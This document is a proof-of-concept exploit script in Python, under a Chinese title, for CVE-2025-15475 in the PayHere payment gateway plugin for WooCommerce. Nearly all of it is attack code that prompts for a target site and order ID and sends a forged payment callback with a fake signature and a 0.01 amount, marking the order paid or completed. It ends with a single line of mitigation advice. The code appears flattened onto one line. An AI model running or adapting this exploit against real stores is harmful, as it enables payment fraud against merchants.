CVE-2025-15475 WordPress PayHere支付插件未授权订单状态篡改漏洞

#!/usr/bin/env python3 """ CVE-2025-15475 PoC - PayHere Payment Gateway Plugin Unauthorized Order Status Modification This PoC demonstrates how an unauthenticated attacker can modify WooCommerce order status through the vulnerable check_payhere_response function. """ import requests import json import sys TARGET_URL = "https://vulnerable-site.com/" TARGET_URL = input("Enter target URL: ").strip().rstrip("/") def send_malicious_callback(order_id, status): """ Send malicious callback to change order status The vulnerable plugin doesn't properly validate the callback request """ endpoint = f"{TARGET_URL}/?wc-api=wc_gateway_payhere" # Malicious callback parameters # The plugin checks 'status' parameter without proper validation payload = { 'order_id': order_id, 'status': status, # Can be: 'paid', 'completed', 'on-hold' 'merchant_id': 'malicious_merchant', 'payhere_amount': '0.01', # Minimal amount 'payhere_currency': 'LKR', 'payment_id': 'PAY' + str(order_id), 'md5sig': 'fake_signature' # Not properly validated } print(f"[*] Sending malicious callback for order {order_id}") print(f"[*] Attempting to change status to: {status}") try: response = requests.get(endpoint, params=payload, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def main(): print("=" * 60) print("CVE-2025-15475 PoC - PayHere Payment Gateway for WooCommerce") print("Unauthenticated Order Status Modification") print("=" * 60) order_id = input("Enter target WooCommerce order ID: ").strip() if not order_id.isdigit(): print("[-] Invalid order ID. Please enter a numeric value.") sys.exit(1) print("\n[*] Available status changes:") print(" 1. paid - Change to Paid status") print(" 2. completed - Change to Completed status") print(" 3. on-hold - Change to On Hold status") choice = input("Select status (1/2/3): ").strip() status_map = {'1': 'paid', '2': 'completed', '3': 'on-hold'} status = status_map.get(choice, 'paid') response = send_malicious_callback(order_id, status) if response and response.status_code == 200: print("[+] Callback sent successfully!") print("[+] If the order exists and was pending, its status may have been changed.") print("\n[*] Mitigation: Upgrade PayHere Payment Gateway Plugin to version 2.4.0 or later") if __name__ == "__main__": main()